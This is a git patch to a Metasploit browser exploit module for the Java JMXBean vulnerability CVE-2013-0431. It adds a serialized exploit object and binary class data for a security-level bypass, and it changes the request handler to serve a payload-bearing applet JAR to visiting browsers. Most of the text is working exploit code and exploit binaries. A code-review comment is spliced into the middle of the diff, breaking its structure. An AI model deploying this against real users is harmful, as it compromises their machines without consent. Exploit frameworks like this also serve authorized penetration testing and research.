From d7b89a22281d72089b0357dbe3904fdc8804601c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 20 Feb 2013 17:50:47 +0100 Subject: [PATCH] added security level bypass --- data/exploits/cve-2013-0431/Exploit.class | Bin 2743 -> 2744 bytes data/exploits/cve-2013-0431/Exploit.ser | Bin 0 -> 1517 bytes .../multi/browser/java_jre17_jmxbean_2.rb | 57 ++++++++---------- 3 files changed, 25 insertions(+), 32 deletions(-) create mode 100755 data/exploits/cve-2013-0431/Exploit.ser diff --git a/data/exploits/cve-2013-0431/Exploit.class b/data/exploits/cve-2013-0431/Exploit.class index 526a59dbaf3d13c6c037fb0b22cd78fd6a6ae2e5..f76c43d3e17695bf6e445aec23cff58a1de7daef 100755 GIT binary patch delta 16 Ycmdlkx_jqk<*2SIVV@?u&+BQ&GsDcR zz1u^@l>&vg6dYuAVM3P5IH_dc7leWtZQw|^M^e)@O#-k;aM{kZ}wUD#n!gx2y?fh{E+ zX3oKlu2;&Miz_a;%bSN!0}sgj#ku*J+dp9v#qZbNd~5shr9aO3rb};{af#;r+9&p( z%P-tmg?a~GjTYiQ8qNfNh;f@ab`Oo^N)F)SNJXh_<&nTUO1S}C4T8IdO$oxpi4r`@ zPmG%K7)=K*$Vg4Jk|>=W!bW*;ur~}jHQCHHTMNuV7aB3Qnz?9<#=+}LOqVBPH$(q! zmk7dd2$rkV-A)Mp(i!+%$|OtB5Ue&~S)bBzaCr%8^9f3ym?y5NOW>vm`ST~=ee~PA z-+ZwO*9P!1OPxCQ=~K4Sj?na^k3>=09jKqGRK~Wa1Br$H|BzTi$*8*Vhp>TDV&*op z4+e1MJd?LDw?}i_05-y%SL(p}IFK-aO`b?)@D6G!r0c*{ZWrN&Vi3AVABM*+Wb~0L*qCtXnF)s-$tLLAmPg!)JjgaB&W?PXwkJhCfD78-sMM%VsZGdc zZOTK>cAz@ru^V?_C8J;dyoUZ59zlgleM<2p#uMjYds&v263W+XGa56QU_aGb8JdDO z=8#h)`kT~anpz}poyCySdXySVaM(FxFo@`~5tG(kW)dWGSC)WS#?5wlbufh8XNy50 z7A>1PE}BFQ8C)CDz&O}inmQ(d_cWr?%yaYEHYhNmB1SV0yK```(hV}gFZ$Di>;5<| zN^xBCWhpfUvC`~2!(~F6b&Y7eSC8EyKU(Qj+Y%l8+{4HPPV0-}1-qxp^FFyVu^=r(lfhNC~O25ZK&AMUYzkK^vW%zgHoeHc|CsJ!B z)cRZDzb8Ln76mQ64y=t6Mx$D%);{!@4(!>m@rq5?lf*Bw2_dJ13_b%5)goAbs1g;K F{tskD^4tIb literal 0 HcmV?d00001 diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 32301affd6..43c42c764d 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb 
@@ -78,44 +78,37 @@ class Metasploit3 < Msf::Exploit::Remote )) end - - def setup - path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class") - @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class") - @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - @exploit_class_name = rand_text_alpha("Exploit".length) - @exploit_class.gsub!("Exploit", @exploit_class_name) - super - end - def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i - jar = payload.encoded_jar - jar.add_file("#{@exploit_class_name}.class", @exploit_class) - jar.add_file("B.class", @loader_class) - metasploit_str = rand_text_alpha("metasploit".length) - payload_str = rand_text_alpha("payload".length) - jar.entries.each { |entry| - entry.name.gsub!("metasploit", metasploit_str) - entry.name.gsub!("Payload", payload_str) - entry.data = entry.data.gsub("metasploit", metasploit_str) - entry.data = entry.data.gsub("Payload", payload_str) - } - jar.build_manifest + paths = [ + [ "Exploit.ser" ], + [ "Exploit.class" ], + [ "B.class" ] + ] - send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) - when /\/$/ - payload = regenerate_payload(cli) - if not payload - print_error("Failed to generate the payload.") - send_not_found(cli) - return + p = regenerate_payload(cli) + + jar = p.encoded_jar + + paths.each do |path| + 1.upto(path.length - 1) do |idx| + full = path[0,idx].join("/") + "/" + if !(jar.entries.map{|e|e.name}.include?(full)) + jar.add_file(full, '') + end + end + fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb") + data = fd.read(fd.stat.size) + jar.add_file(path.join("/"), data) + fd.close end + + print_status("Sending Applet.jar") + send_response( cli, jar.pack, { 'Content-Type' => 
"application/octet-stream" } ) + when /\/$/ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') @@ -126,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote def generate_html html = %Q|Loading, Please Wait...| html += %Q|
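Review bot: In the `.jar` branch of `on_request_uri`, `p = regenerate_payload(cli)` is followed directly by `jar = p.encoded_jar`, and the nil check that the removed `/\/$/` code performed is gone, so a failed regeneration would raise `NoMethodError` in the request handler instead of being logged and answered with a 404. Restore the guard right after the call, for example `unless p` / `print_error("Failed to generate the payload."); send_not_found(cli); return` / `end`, and consider a more descriptive local name than `p`, which shadows `Kernel#p`. The file read uses `fd = File.open(...)` with a trailing `fd.close`, so the handle is not closed if `read` or `add_file` raises; the block form `data = File.open(file, "rb") { |fd| fd.read }` closes it on every path. Every entry in `paths` has one element, so the `1.upto(path.length - 1)` directory loop appears never to run and could be dropped or given a comment saying why it is kept. The body of `on_request_uri` continues past the end of this hunk.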

Loading, Please Wait...

| - html += %Q|| + html += %Q|| html += %Q|| return html end